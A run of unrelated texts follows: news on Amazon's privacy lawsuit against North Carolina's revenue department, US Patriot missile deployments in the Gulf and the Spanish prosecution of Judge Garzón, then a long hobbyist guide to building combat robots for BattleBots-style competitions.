Campbell said he and his agent , Joel Segal , had received interest from the Carolina Panthers on Friday until they selected Notre Dame 's Jimmy Clausen with the No. 48 overall pick .
— Internet retail giant Amazon.com has filed suit to block the North Carolina Department of Revenue 's attempts to find out who in the state is buying what online .
The suit , , names Revenue Secretary Ken Lay as the defendant .
Amazon is seeking a court order that would halt the Revenue Department 's efforts as a violation of the First Amendment .
Lay could n't be reached for comment Tuesday , but spokeswoman Beth Stevenson said the Revenue Department is n't trying to collect back taxes from people .
Because Amazon has no offices or warehouses in North Carolina , the company is n't required to collect the customary sales tax on shipments .
North Carolina requests voluntary compliance from taxpayers , asking them to include a " consumer use tax " on their individual income tax returns for anything purchased or received through the mail .
Last year , North Carolina passed a law that required out - of - sate retailers to collect sales tax in the state if they have marketing affiliates within the state .
Amazon responded by ending its affiliate program in North Carolina and currently does n't collect sales tax in the state .
Amazon contends in the suit that it routinely provides the Revenue Department with " voluminous information " about its sales to North Carolina addresses as part of routine audits of the company 's compliance with sales and use tax laws .
The information includes the date and total price of each transaction , the city , county and ZIP code to which each item was shipped and Amazon ’s standard product code for each item , which allows officials to see the description of every product purchased .
In March , however , the Revenue Department threatened to hold a civil contempt hearing for Amazon if the company does n't also turn over the names and addresses of anybody in North Carolina who has purchased goods off its website since August 2003 , according to the suit .
The company said that amounts to nearly 50 million purchases .
" If Amazon is forced to comply with this demand , the disclosure will invade the privacy and violate the First Amendment rights of Amazon and its customers on a massive scale , " the suit states .
" The ( Revenue Department ) does not need personally identifiable information about Amazon ’s customers in order to audit Amazon ’s compliance with state tax laws .
All it needs to know is what items Amazon sold to North Carolina customers and what they paid , and Amazon has already provided that information . "
Stevenson could n't say why state officials need customer names and addresses for an audit of Amazon 's compliance with tax laws .
" The best - case scenario for customers would be where the North Carolina Department of Revenue withdraws their demand because they recognize that it violates the privacy rights of North Carolina residents , " Amazon spokeswoman Mary Osako said .
Amazon argues that most of its sales are in " expressive materials , " such as movies , music and books .
Turning over details of such purchases to the government could affect people 's buying habits , making them less likely to buy " items that might be personal , sensitive or controversial , " according to the suit .
The company has a firm policy of not sharing customer data with outsiders , giving people who use the website an expectation of privacy , according to the suit .
" Amazon asserts the privacy and First Amendment rights of itself and of its customers so that Amazon may sell – and customers may read , hear or view – a broad range of popular and unpopular expressive materials with the customers ’ private content choices protected from unnecessary government scrutiny , " the suit states .
Some area residents who have purchased items through Amazon said they do n't think the state should be prying into their buying habits .
" It 's really none of their business what I ordered , " Saleemah Abdullah said .
" My books and what I read is pretty much my business , " Barry Edwards said .
" I think it gets sticky when the state is asking a company for people 's private information , " Katrina Henderson said .
" I could understand the state 's side of it where they want people to pay the amount of taxes that they owe . "
Tension between the US and Iran heightened dramatically today with the disclosure that Barack Obama is deploying a missile shield to protect American allies in the Gulf from attack by Tehran .
The US is dispatching Patriot defensive missiles to four countries – Qatar , United Arab Emirates , Bahrain and Kuwait – and keeping two ships in the Gulf capable of shooting down Iranian missiles .
Washington is also helping Saudi Arabia develop a force to protect its oil installations .
American officials said the move is aimed at deterring an attack by Iran and reassuring Gulf states fearful that Tehran might react to sanctions by striking at US allies in the region .
Washington is also seeking to discourage Israel from a strike against Iran by demonstrating that the US is prepared to contain any threat .
The deployment comes after Obama 's attempts to emphasise diplomacy over confrontation in dealing with Iran – a contrast to the Bush administration 's approach – have failed to persuade Tehran to open its nuclear installations to international controls .
The White House is now trying to engineer agreement for sanctions focused on Iran 's Revolutionary Guard , believed to be in charge of the atomic programme .
Washington has not formally announced the deployment of the Patriots and other anti-missile systems , but by leaking it to American newspapers the administration is evidently seeking to alert Tehran to a hardening of its position .
The administration is deploying two Patriot batteries , capable of shooting down incoming missiles , in each of the four Gulf countries .
Kuwait already has an older version of the missile , deployed after Iraq 's invasion .
Saudi Arabia has long had the missiles , as has Israel .
An unnamed senior administration official told the New York Times : " Our first goal is to deter the Iranians .
A second is to reassure the Arab states , so they do n't feel they have to go nuclear themselves .
But there is certainly an element of calming the Israelis as well . "
The chief of the US central command , General David Petraeus , said in a speech 10 days ago that countries in the region are concerned about Tehran 's military ambitions and the prospect of it becoming a dominant power in the Gulf : " Iran is clearly seen as a very serious threat by those on the other side of the Gulf front . "
Petraeus said the US is keeping cruisers equipped with advanced anti-missile systems in the Gulf at all times to act as a buffer between Iran and the Gulf states .
Washington is also concerned at the threat of action by Israel , which is predicting that Iran will be able to build a nuclear missile within a year , a much faster timetable than assessed by the US , and is warning that it will not let Tehran come close to completion if diplomacy fails .
The director of the CIA , Leon Panetta , met the Israeli prime minister , Binyamin Netanyahu , and other senior officials in Jerusalem last week to discuss Iran .
Pro-Israel lobby groups in the US have joined Republican party leaders in trying to build public pressure on the administration to take a tougher line with Iran .
One group , the Israel Project , has been running a TV campaign warning that Iran might supply nuclear weapons to terrorists .
" Imagine Washington DC under missile attack from nearby Baltimore , " it says .
" A nuclear Iran is a threat to peace , emboldens extremists , and could give nuclear materials to terrorists with the ability to strike anywhere . "
Washington is also concerned that if Iran is able to build nuclear weapons , other states in the region will feel the need to follow .
Israel is the only country in the Middle East to already have atomic bombs , although it does not officially acknowledge it .
The US secretary of state , Hillary Clinton , said in London last week that the US will press for additional sanctions against Iran if it fails to curb its nuclear programme .
Europe 's foreign affairs minister , Catherine Ashton , today said the UN security council should now take up the issue .
" We are worried about what 's happening in Iran .
I 'm disappointed at the failure of Iran to accept the dialogue and we now need to look again at what needs to happen there , " she told Sky News .
" The next step for us is to take our discussions into the security council .
When I was meeting with Hillary Clinton last week we talked about Iran and we were very clear this is a problem we will have to deal with . "
However , China and Russia are still pressing for a diplomatic solution .
Tony Blair , Middle East envoy on behalf of the US , Russia , the UN and the EU , continually referred to what he described as the Iranian threat during his evidence at the Chilcot inquiry last Friday .
Textual analysis now shows that he mentioned Iran 58 times .
Besides the new missile deployment , Washington is also helping Saudi Arabia to create a 30,000 - strong force to protect oil installations and other infrastructure , as well as expanded joint exercises between the US and military forces in the region .
The move is a continuation of the military build - up begun under former president George W Bush .
In the past two years , Abu Dhabi has bought $ 17bn ( £ 11 bn ) worth of weapons from the US , including the Patriot anti-missile batteries and an advanced anti-missile system .
UAE recently bought 80 US - made fighter jets .
It is also buying fighters from France .
Petraeus said in a speech in Bahrain last year the UAE air force " could take out the entire Iranian air force , I believe " .
Missile defence
Patriot missiles are designed to intercept enemy missiles before they reach their target .
Since production began in 1980 , 9,000 missiles have been delivered to countries including Germany , Greece , Taiwan and Japan .
During the first Gulf war Patriot success was 70 % in Saudi Arabia and 40 % in Israel .
Since then the US has spent more than $ 10 bn ( £ 6.3 bn ) improving , among other aspects , the system 's radar and computer compatibility for joint forces action .
Once in position , the system requires a crew of only three people to operate .
Each missile weighs 700kg and has a range of about 100 miles .
The US navy is in the process of upgrading all its Ticonderoga class cruisers and a number of destroyers to carry the Aegis ballistic missile defence system .
It uses a surface - to - air missile that is capable of intercepting ballistic missiles above the atmosphere .
It has also been tested on failing satellites as they fall to earth .
Each missile is over 6 m long and costs more than $ 9 m .
James Sturcke
( Washington , DC ) – Spanish authorities should abide by the United Nations call for an end to its 1977 amnesty law rather than prosecuting a judge seeking accountability for past abuses , Human Rights Watch said today .
Judge Baltasar Garzón of Spain ’s National Audience tribunal is currently under criminal investigation for looking into 22 alleged cases of illegal detention and forced disappearances involving more than 100,000 victims , committed between 1936 and 1951 .
Spanish courts have routinely closed investigations into abuses committed during the country ’s civil war ( 1936 - 1939 ) and the dictatorship of General Francisco Franco ( 1939 - 1975 ) by invoking a 1977 amnesty law , which covers all crimes “ of a political nature ” committed prior to December 1976 .
The case against Garzón is based , among other factors , on the judge arguing that the amnesty law did not apply to crimes against humanity .
“ Spanish courts have routinely failed to investigate allegations of horrendous crimes of the past , but are being surprisingly active in prosecuting a judge who tried to push for accountability , ” said José Miguel Vivanco , Americas director at Human Rights Watch .
The Supreme Court is carrying out a criminal investigation into Garzón ’s responsibility for breaching his duties as a judge ( delito de prevaricación ) .
A Supreme Court judge argued that Garzón had failed to apply the 1977 amnesty law to the forced disappearances under investigation , and that there is no basis in international law to hold that these crimes should not be subject to the amnesty law .
An appeal presented by Garzón a few days later remains pending .
Under international law , governments have an obligation to provide victims of human rights abuses with an effective remedy – including justice , truth , and adequate reparations – after they suffer a violation .
The International Covenant on Civil and Political Rights ( ICCPR ) , which Spain ratified in 1977 , specifically states that governments have an obligation “ to ensure that any person whose rights or freedoms … are violated shall have an effective remedy . ”
In 2008 , the UN Human Rights Committee , in charge of monitoring compliance with the ICCPR , called on Spain to repeal the 1977 amnesty law and to ensure that domestic courts do not apply limitation periods to crimes against humanity .
The European Court of Human Rights held in 2009 , as a general principle , that an amnesty law is generally incompatible with states ’ duty to investigate acts of torture or barbarity .
Human Rights Watch praised Garzón ’s work in achieving accountability for atrocities around the world .
Applying the principle of universal jurisdiction , Garzón issued an historic indictment against Chilean General Augusto Pinochet for the murder and torture of thousands , which led to Pinochet ’s detention in London in 1998 .
His arrest was critical in prompting the Chilean justice system to prosecute past abuses .
Garzón ’s request to Mexico led to the extradition of Ricardo Miguel Cavallo , a former military official from Argentina implicated in atrocities during the country ’s military dictatorship .
Cavallo was extradited to Spain in 2003 on charges of genocide and terrorism , and was eventually sent to Argentina to be tried by Argentine courts .
“ Garzón ’s rigorous and principled interpretations of international law helped bring justice for grave human rights abuses in other countries , ” said Vivanco .
“ It is ironic that Spain is failing to live up to the standards that Garzón helped enforce abroad . ”
While this was written many years ago with Battlebots in mind , the information still applies to robot building .
All links mentioned below were last verified May 2012 .
If you want to relive some of the many great Battlebot moments , check out these videos .
Introduction :
Given the increasing popularity of robotic combat sports such as Comedy Central 's BattleBots , a growing number of people are thinking about building a fighting robot of their own .
If you are one of these individuals and you have no idea where to start then I highly recommend that you carefully read through this tips section .
My background is in chemistry and computer science but I 've recently been gathering a lot of information on building fighting machines and I 'd like to share what I have learned with you .
Many additional links can also be found in this text .
The first thing that I would like to make clear is that building a BattleBot of competitive quality is not easy .
It takes a lot of hard work , both physical and mental .
I should also mention that you will need to be prepared to spend a significant amount of money .
Even lightweight competitors usually spend over a thousand dollars on construction and some super - heavyweights can cost tens of thousands to build .
I 'll try to present some money saving ideas to help in this respect .
With that said , if you are willing to spend the time and the money , then just about anyone can build his or her own fighting machine .
Keep safety in mind as well and be sure to have proper adult supervision if you are under eighteen .
Do your research :
There is a lot of information out there on the web if you are willing to look for it .
I hope that this resource is a helpful start , but by no means should you rely on a single source for all of your construction advice .
Visit our links section for just a small taste of what you can find on the web .
Construction tips from experienced competitors are especially helpful .
Spending a few hours on research can save you weeks of construction time and thousands of dollars .
Try http://www.puppetmaster-robotics.com/faq.html for a good FAQ 's page .
It also helps to be familiar with the rules of whatever event you are planning to attend .
Unfortunately , the rules and weight classes vary significantly from one competition to another , thus building a single bot for multiple competitions can be troublesome .
Watching the competitions is another valuable source of ideas .
You can see first hand which general design principles are successful and which ones fail .
My students and I often videotape and replay the televised matches .
Do n't get me wrong , no one likes a copycat and there is no fun in just copying someone else 's design ; but you do n't have to reinvent the wheel either .
Take a few ideas here and there and add some of your own original concepts to produce a quality bot that you can call your own .
Assemble a team and a workshop :
So now that you have decided that you 're ready to build a killer robot , you have to be sure you have the tools and manpower that you 'll need .
Very few builders work alone because of the huge number of man-hours involved .
It is favorable to have someone with metalworking skills and someone with a background in electronics on the team .
Most people that wake up one morning and decide they want to compete in Battlebots tend to be tinkerers of one sort or another .
So chances are you have a workshop of some kind already if you are reading this article .
But if you do n't I suggest you have the following at your disposal : a big open area where you can make a real mess without getting in trouble , table saw , chop saw , rotozip , jig saw , hacksaw , drill press , hand drill , ratchets , screwdrivers , hammers , rivet gun , quick clamps , vice , vice grips , T - square , tape measure , grinder , sander , welder of some type , and finally a shop vac to clean up that really big mess you just made .
Basic plan and body design :
Before you start to build or order any parts , come up with a list of some key features that you want your robot to have .
This is usually a system of give and take .
Perhaps you want a bot with really thick heavy armor , or maybe that weight is better spent on larger motors to give your bot a speed advantage .
Weight is a constant concern and you 'll probably find it challenging to stay within the limits of whatever weight class you decide to compete in .
Keep in mind that as your bot goes up in weight , the construction costs will dramatically increase as well .
Once you know your weight class and the special features you want your robot to have , you need to decide on a general body design .
These include , but are not limited to , boxes , wedges , spin bots , and walkers .
Naturally , more complex designs are fair game too , however , highly complex shapes result in large surface areas relative to their volume .
Thus a dodecahedron bot design will cost you a lot of armor weight .
Various derivations of the basic box - like design are very common because it drastically simplifies the engineering process .
Properly designed wedge bots have been quite successful in the past as well , however this design is getting rather old .
Spin bots are an interesting concept that uses the external spinning shell of the bot as both the armor and the weapon .
Team Blendo has an excellent site explaining the primary advantages and disadvantages of spin bots at http://www.m5industries.com.
Walkers are bots that use some means of locomotion other than wheels .
They have not been very successful because they tend to be slow and cumbersome .
Realizing this inherent disadvantage , many competitions give walkers significant weight handicaps .
No matter what body type you decide to go with , try to keep your center of gravity as low as possible .
Tipping over and being incapacitated can be your worst nightmare .
If you really want to play it safe , design your robot to be invertible .
The ability to drive even after being flipped was one of our team 's key concept points .
This does limit your weapons options , but we thought it was a worthwhile sacrifice .
Keep in mind that there are a growing number of robots such as Toro that are exclusively designed to flip their opponents .
A flippable design renders this attack almost useless as long as you have a sturdy construction that can handle the shock forces involved .
Keeping your ground clearance as low as possible also helps to prevent flip bots and those pesky wedges from getting under you .
I suggest having about half an inch of clearance .
My final piece of advice is to try to keep your design plans flexible and open to new ideas .
Bounce your ideas off some friends .
It 's easy to fall in love with your own creation and we all know that love is blind .
An impartial friend may be able to point out some obvious vulnerabilities that you overlooked .
Leaving a little open space inside your robot can help a great deal towards making modifications .
I would advise against designing the entire robot around a single weapon .
Build a sturdy , reliable weapons delivery platform , and consider a modular weapons section .
This way you can compete in different competitions or even different weight classes with your latest and greatest attack strategy without having to design and build an entirely new bot from scratch .
Go to top of page
Build a frame :
A solid frame is the key to holding everything in place .
Imagine the forces involved when a pair of three hundred pound robots collide head on at twenty miles per hour .
Some builders simply attach everything to a bottom platform and place an armor shell around it .
This is a mistake in my opinion , as a well - designed frame can add a great deal of structural integrity at a very low cost in weight .
Your main options are to use round or square tubes .
Round tubes tend to be slightly stronger pound for pound than their square counterparts .
The problem with round tubes is that they can be harder to work with , especially if you are going to be bolting things in place .
We decided to go with square aluminum tubing for Logan .
Some other options would include I - beams or angle beams .
When you are designing your frame , try to determine the most likely directions of the most significant forces that your robot is likely to sustain .
Do n't waste valuable weight on unnecessary support .
Finally , consider welding your frame together rather than using bolts or rivets .
Welds are almost always stronger .
If you have no means of welding , consider contacting some local metal shops .
You 'll probably be able to find a welder willing to work with you on such a cool project .
High school vocational schools may also be willing to help out .
Kids love this stuff .
Select your armor :
It does n't take a genius to realize that these machines need to be designed to take a lot of abuse .
Your armor is all that stands between your vital electronics and your opponent 's weapon .
First , try to determine what locations are most likely to be hit during combat .
Many builders place extra armor on the front of their robots .
The new and improved kill - saws in the BattleBots arena , which pop up from the ground , should n't be overlooked either .
You 'll also have to decide if you want to bolt your armor in place or weld it onto the frame .
Welding it to the frame is definitely stronger , but this makes it much harder to repair damaged sections .
If you are going to go with the welding approach , you need to make sure that the armor and frame are built from the same material .
Dissimilar metals such as steel and aluminum cannot be welded together .
Even different grades of the same material can make the welding process more difficult .
There are an amazing number of materials to choose from to armor your robot .
I wo n't cover the more exotic varieties , but some common options include wood , steel , aluminum , titanium , and Lexan .
I 'll break down some of their advantages and disadvantages .
There really is n't much to say about wood .
Ummm … I think it comes from trees .
It 's probably the least expensive option and you may have more experience in working with this material .
Given the quality of today 's combat robots , I do n't think that one could expect wooden armor to last very long .
Perhaps a 2X4 could be placed here and there as extra protection because wood does offer good compression , which could act like a crumple - zone to absorb shock damage .
Steel will offer you the highest level of protection dollar for dollar .
If money is tight , I suggest you go with steel .
It is very strong and is easy to weld .
You 'll go through many blades , but cutting it is fairly simple as well .
Just be sure to use a metal cutting blade , not a wood cutting blade .
There is only one major disadvantage to using steel .
It has a very high density .
A square foot of quarter inch steel ( 1018 grade ) weighs a whopping 10.33 pounds .
So to armor just a small cubic foot with this armor would cost you 62 pounds !
You have various grades of steel to choose from as well .
You can obtain detailed technical specs on many types of metal alloys and other materials at http://www.matweb.com.
Aluminum is not quite as strong as steel but it is significantly lighter .
It also tends to be more expensive and slightly harder to weld .
Despite these disadvantages , the huge weight savings that it provides often make it the material of choice , especially in lower weight divisions .
A square foot of quarter inch aluminum ( 6061 - T6 grade ) weighs 3.53 pounds .
As a rough rule of thumb , a high - grade aluminum alloy is about one half the strength but only one third the weight of an equivalent piece of steel .
An excellent source of custom - cut aluminum can be found at http://onlinemetals.com.
Titanium alloy armor has been gaining popularity amongst higher budget robots .
It can be prohibitively expensive but it's much stronger than aluminum and much lighter than steel .
Plus it just sounds cool to say that you have titanium armor .
I have never worked with this material , but I have been told that it can be quite difficult to machine and weld .
To help a bit with the cost , you can look for sources of scrap titanium pieces such as listed at http://www.metalworld.com/a/0166.html.
Lexan has also gained much notoriety in the robotic combat community .
Lexan is a high - grade form of polycarbonate ( PC ) manufactured by GE .
It 's even much lighter than aluminum and is very resistant to penetration .
As a fairly non-scientific explanation of its strength ; we found that an overhead swing from a large pickax failed to penetrate a quarter inch thick piece .
Its flexibility also gives it good shock absorbing characteristics and makes it almost impossible to dent .
The two primary disadvantages of this material are its expense and the fact that it can be easily cut .
If you are going up against a large bladed weapon , Lexan may not be the ideal choice .
If you are going to use this material , do not use regular paint or other organic solvents on it .
You may not see any damage done , but it will significantly weaken the material on a molecular level .
Use water based paints and cleaners if you must .
Colored Lexan is also available .
You can purchase and get more information about PC at http://www.goodfellow.com/static/A/CT30.html.
Consider your mode of locomotion and turning :
There are three major types of locomotion to choose from : wheels , treads , and walkers .
There have even been some more exotic attempts such as the snake - like BattleBot appropriately named Snake by Team Sinister .
Walkers are relative novelties and I 've already discussed their advantages and perhaps more significantly , their disadvantages above .
Tank - style treads are an interesting option that can provide excellent traction if properly designed .
I personally decided against the use of treads because there is always a danger that they can fall off during combat .
Of course , they are also a little harder to build than their wheeled counterparts .
Some variation of the basic wheel design is by far the most popular choice of locomotion amongst robot builders .
They provide excellent speed and maneuverability .
Some people think that rubber tires are susceptible to being punctured and flattened .
This is true if you use air filled tires , which you should never do .
Flat - proof foam filled tires are available at ( Sorry - Site is no longer around ) .
You may want to use 2 , 4 , or even 6 or more wheels to drive your bot .
Lightweights make common use of two wheel drive systems to save weight .
Additional stability can be gained by adding caster wheels .
Four wheel drive is fairly typical and some builders try to gain a pushing advantage with six wheel drive .
Never underestimate the advantage of being able to push your opponent around .
This allows you to use arena hazards to your advantage and scores good aggression points with the judges .
You 'll want some way to steer your robot around .
A few builders use car like steering but this is complex to build and , in my opinion , is just asking for something to break during combat .
The popular choice is tank - like steering , where the left and right tires or treads can go forward or backwards independently .
This enables a robot to turn in place if one side goes forward while the other side is in reverse .
Naturally , you 'll need at least two drive motors to achieve this .
Go to top of page
Steering control options :
Let 's assume that you are going to use the popular tank - like style of steering .
You still have to decide on your method of electronic steering control .
At this point , I am primarily discussing this from the human operator 's control options .
Your decision of steering control options will dramatically affect your electronics , which will be discussed later in this article .
The simplest option would be a simple on - off switch for the left and right drives .
This will save you a lot of money on electronics because this could be achieved with simple relay switches .
This provides poor control and should not be considered unless you absolutely cannot afford the other options .
You 'll probably want to have reversing capabilities , and the ability to control your exact speed and turning radius .
The easiest way to achieve this is to have each drive connected to a single axis joystick .
Thus full speed forwards would involve pushing both joysticks all the way up ,
One stick up and the other down would result in a spin , One joystick full up and the other partially up would result in a slow turn , etc .
You 'll need speed controllers to achieve this , which will be discussed in more detail below .
A slightly more elegant approach is single 2 - axis joystick control .
In this case , full speed ahead would be achieved by pushing the joystick completely up , half up would produce 50 % forward speed , and pushing the joystick completely to the left would result in a spin by making the right drive go forwards and the left drive go backwards , etc .
Accomplishing this requires channel mixing which can be achieved by higher - end speed controllers , some radio transmitters , or in some cases via 3rd party electronic add - ons .
Some drivers feel that single joystick control is more responsive , but I happen to prefer the 2 stick control myself .
I guess it 's a matter of personal preference .
Just be sure you have good control of your robot .
Good drivers always have the advantage .
Motors , engines , and drive trains :
Most builders use electric motors to power their bots .
However , engines can be an interesting option to give you a power advantage over your competitors .
Not all competitions allow the use of combustion engines but BattleBots does .
I decided not to use an engine for Logan because they have a lot of restrictions such as how much fuel you can use .
I also wanted Logan to run upside down , and to the best of my knowledge , an engine will stall when upside down as soon as the carburetor runs out of fuel .
If you decide to use an engine , keep in mind that you 'll have to have a means of remotely controlling the starter , the kill switch , and the throttle .
This is usually done with servomotors .
You 'll also need a transmission and a means of reversing .
This can get fairly complicated , but think of all the weight you can save on batteries !
There is also the added advantage of not having to replace or recharge batteries between battles .
Also note that the spark plugs in an engine can cause radio interference .
Using resistor spark plugs can prevent this problem .
You can buy small engines just about anywhere .
I recommend the use of 2 stroke engines .
You 'll probably end up using motors like I did because they are so much easier to use .
Try to find motors that have high torque to weight ratios .
The torque of a motor is usually measured in inch pounds .
A motor with 50 inch pounds of stall torque would be the equivalent of 50 pounds of force applied to a one inch lever arm , or equivalently , a 5 pound force applied to a 10 inch lever arm .
When a motor first starts up it produces a torque close to its stall value .
This should not be confused with its continuous torque rating which is the amount of torque it is designed to produce for an extended period of time without overheating or smoking .
If you are using a raw motor ( without a gearbox ) you 'll have very high rpm's but very little torque so you 'll need to gear it down .
You can use a gearbox , or chains and sprockets , or belts and pulleys to accomplish this .
As an example , a motor producing 6 inch pounds of torque at 2000 rpm's could be set up with a 10:1 gear reduction to produce 200 rpm's at 60 inch pounds of torque ( less a small amount due to gear friction and the like ) .
So its slower but has more pushing power .
This is the same idea you use when riding a bike ; you would never try to climb a steep hill in tenth gear .
The new 200 rpm's is a more reasonable speed for our tires to spin .
You can get the speed of your bot in miles per hour by using the following formula :
Wheel diameter in inches times rpm's of tire times 0.002973 .
This would give us 5.9 mph for a 10 inch diameter tire spinning at 200 rpm's .
You can avoid all the worries of building a correctly geared drive system if you buy motors with a gear box already set to the desired rpm's .
This way , you can attach the wheels directly to the shaft of the motor .
Gearboxes are also nicely contained and less susceptible to damage or slippage .
You may want to try over - volting your motors .
Let 's say you have a 12 - volt motor that is rated to produce 0.5 horsepower at 100 rpm's drawing 10 amps of power .
If you take this motor and hook it up to a 24 - volt source , it will produce 2.0 horsepower at 200 rpm's with a 20 - amp draw .
Notice that when the voltage was doubled , the rpm's and the amps also double but the horsepower was quadrupled .
There is of course a price to pay , you may overheat and burn out the motor .
However , robot combat bouts are usually only a few minutes long and thus motor overheating is less of a problem .
You may also try adding heat sinks or cooling fans to counter this .
Do n't overdue it either .
I would n't try running a 12 - volt motor on a 48 - volt system .
Logan uses 24 - volt motors running on a 36 - volt system .
Higher voltage systems are also more efficient as less energy will be lost to the heating of wires .
But remember , to achieve this higher voltage , you 'll need more batteries … and batteries are heavy !
Motors can be an expensive part of the robot and you 'll probably want a spare as well , in case one burns out .
One inexpensive option is to use automotive 12 - volt power window motors .
These are generally not suitable for heavyweights unless you 're going to use some sort of exotic 12 wheel drive system or something .
You may find the power and high rpm's of car starter motors attractive , but be careful … most starter motors are not reversible .
They are also exceedingly heavy .
If the junkyard is not your style and you 'd rather just shell out the cash you can find a wide variety of motor suppliers online .
You might also want to check out http://www.3rivers.net/~cmac/cmac16.htm.
Batteries :
Unless you went with the option to use a combustion engine , you 'll need to get some good quality rechargeable batteries to power your motors .
Unfortunately , batteries are very heavy and can cost you a lot of weight .
Do n't try to use car batteries .
For one thing , they are not allowed in most competitions because they 'll leak acid when upside down .
But you would n't want to use them anyway because they are designed to produce very high amps for a short period of time .
You 'll want batteries designed to produce a moderate amperage for a sustained interval .
Most builders choose to use sealed lead - acid batteries or nickel - cadmium batteries .
They 'll both do the trick but nickel - cadmium batteries are a little more efficient but much more expensive as well .
Also remember that you can hook up several batteries in series ( positive to negative ) to obtain additive voltages .
Logan uses three 12 - volt batteries to obtain a 36 - volt system .
When you place batteries in series , they should all be the same voltage .
For example , if you wanted an 18 - volt system , you would use three 6 - volt batteries , not a 12 - volt and a 6 - volt .
This is because the battery of lower voltage would be forced to work harder .
The most important thing to keep in mind when selecting your batteries is the amount of power you can draw from them .
The total energy that a battery can supply is measured in amp hours ( AH ) .
You may think that an 18 AH battery can produce a current of 18 amps for an hour , but this is not the case !
You see , the slower you draw current from the battery , the more efficient it will be and the battery companies sort of cheat a little with their rating systems .
The way that 18 AH rating was achieved was like this : 0.9 amps was sustained for 20 hours and 0.9 X 20 gives you 18 AH .
However , as you draw current faster , more energy is lost due to the internal resistance of the battery .
This same battery can only supply a current of 12 amps for an hour .
You may have powerful motors drawing over a hundred amps and thus the efficiency of your batteries drops even further .
So as a general rule of thumb , I suggest that you divide the AH labeled on the battery by 2 in order to provide a more realistic figure .
It is also very important that you realize wiring batteries in series increases the voltage but does not increase the AH rating .
You can wire batteries in series for additive voltage , or in parallel for additive AH but you can't have it both ways .
To complicate matters even further , you basically need to make an educated guess as to how much current your motors will be drawing .
The most they can draw is based on the stall amperage of the motor .
The least you can expect them to draw is their nominal continuous amperage .
( You 'll have to ask the manufacturer of the motor for these stats if it is not printed on the motor . )
The actual amount of amps that the motors will draw is dependent on the load placed upon them .
Thus a motor draws more amps when the bot is accelerating or pushing an opponent .
My best advice is to take an average of the nominal and stall amperages of the motors to try to get an estimate .
Naturally , if you used over - volting as mentioned above , you 'll have to take this into account as well .
If worse comes to worse , you may have to use a little trial and error or simply buy batteries that you know will provide much more power than you will need , but this again costs valuable weight .
Once you 're ready to buy your batteries , you may want to check out Powersonic at http://www.power-sonic.com.
They have a good selection to choose from .
If you 're going to buy high quality rechargeable batteries , you should get a high quality charger as well .
Some cheaper chargers actually dump some AC current into the battery along with the DC .
This will shorten the life of your batteries , and cost you more money in the end .
If you are in doubt as to which charger to buy , simply ask the manufacturer of the battery you select to suggest one .
Go to top of page
Speed controllers :
Speed controllers are electronic components that do as their name implies , they control the speed of your motors .
But a good quality modern speed controller performs many other functions as well .
If a motor is put in reverse , the controller will be sure to stop the motor before reversing .
This prevents damage to the motor .
The controller can also put much of the energy of the spinning motor back to the batteries in a controlled fashion when braking .
Remember , a spinning motor is also a generator .
Some allow you to set various types of acceleration and deceleration curves so you can tweak the responsiveness of your bot .
Failsafe mechanisms for short circuits and overheating may also be included .
Speed controllers are complex pieces of electronics and come with an accordingly steep price tag .
They are usually the most expensive part in a robot .
Speed controllers are usually rated according to amperage .
The more amperage that they are rated to handle , the more they cost .
They can cost up to $ 800 and depending on your method of control and steering , you may require two such controllers ( for left and right drive ) or perhaps even a third to control a weapon motor .
If you use speed controllers with higher amp ratings than you require , no harm will be done other than to your wallet .
Getting controllers that cannot handle the amps of your motors will result in controller shut down or even permanent damage if it is not equipped with some sort of temperature monitoring system .
The amp rating of a speed controller is usually the amperage that it can sustain for about a minute or so without overheating .
Again , you can add heat sinks or cooling fans to try to get longer sustained amperage from a controller .
But either way , be sure the controller can handle at least three times the amperage of the nominal draw of your motors .
Some advanced controllers such as those offered by Vantec at http://www.vantec.com can plug directly into your radio receiver just like a servomotor .
This can simplify your electronics .
Vantec controllers can also perform channel mixing to allow a single 2 - axis joystick to give you tank - like driving .
If you require high amp , high voltage ( 36 volts and up ) supply , you want to consider using 4QD controllers , which can be found at http://www.4qd.co.uk/index.html.
They are less expensive for a given amp rating but do n't allow you to plug directly into your radio receiver .
You can handle this in one of two ways .
You can use standard servomotors to control a joystick - like potentiometer , which is in tern connected to the controller .
This may be a bit cumbersome to set up but has the advantage of electronically isolating your controller from the receiver .
Or you can use a 3rd party electronics adaptor to allow a 4QD controller to interface with the receiver such as the one found at http://www.teamdelta.com/products/prod2a.htm.
This product will not allow for dual - channel mixing so you 'll have to make further modifications if you wanted single joystick control .
Radio controllers :
You do n't want to spend hundreds of hours building a robot only to lose a match because you lost radio contact with your machine .
You may be tempted to use an inexpensive AM radio transmitter but these are very susceptible to interference .
The last thing you want is an out of control BattleBot on your hands .
Use a high quality FM transmitter , or better still , a PCM transmitter .
It is also a good idea to keep your receiver antenna at least one inch away from metal surfaces .
The biggest decision to make is how many channels you will need .
You 'll need at least two , one for each drive wheel .
You then need channels for weapons and the like .
A good 4 - channel FM radio will cost you about $ 200 .
Some builders use a pair of 2 - channel radios instead .
This allows one person to drive the bot , while the other controls the weapon .
This later option is probably what we will use to control Logan .
You can find a good selection of radio controllers at http://www.towerhobbies.com.
Building your weapon(s ) :
This is probably the most exciting and fun aspect of building a combat robot .
Just let your imagination run wild .
Well , actually read over the rules of the tournament before you get too crazy .
The chemist in me developed a plan to use a hollow spike to inject a liter of concentrated nitric acid into the opposing bot .
Unfortunately for me , most tournaments do n't allow for the use of liquid weapons .
I was going to call him Venom .
Be creative but be sure your weapon is reliable and capable of inflicting real damage .
There are many weapons out there that lack the ability to damage a well - armored robot .
If you have a little weight left over at the end of construction , you may want a backup weapon as well to help give your robot the edge it needs to win .
A modular weapons design would also be useful to keep your opponents guessing as you experiment with various blades and so forth .
I 'll try to briefly discuss some of the advantages and disadvantages of the major weapon varieties .
Saws are a fairly common choice , but they actually do very little damage .
Your opponent is not going to stay still for you , so keep that in mind .
Blades can also be easily damaged , especially by a side impact .
The few effective saws that I have seen have been gas powered for more kick and mounted horizontally to avoid the problem of side impact damage .
Spinning disc weapons are sometimes confused with saw blades but they really work on a much different principle .
A disc builds up a lot of kinetic energy and delivers all of its impact to the opponent in one fast blow .
This energy is usually obtained via a combination of high rpm's and a large diameter , which together generate very fast speeds on the outer perimeter .
They do n't have a lot of sharp teeth for cutting , rather just a few teeth for ripping .
This also imparts a great deal of shock damage to the electronics of the opponent .
But for every action there is a reaction , so you had better have a sturdy system to absorb or allow for shock on your bot as well .
Once it hits , the disc usually loses most of its momentum so it may take some time to rev up to speed again .
Much like the blades , they can often be easily damaged as well .
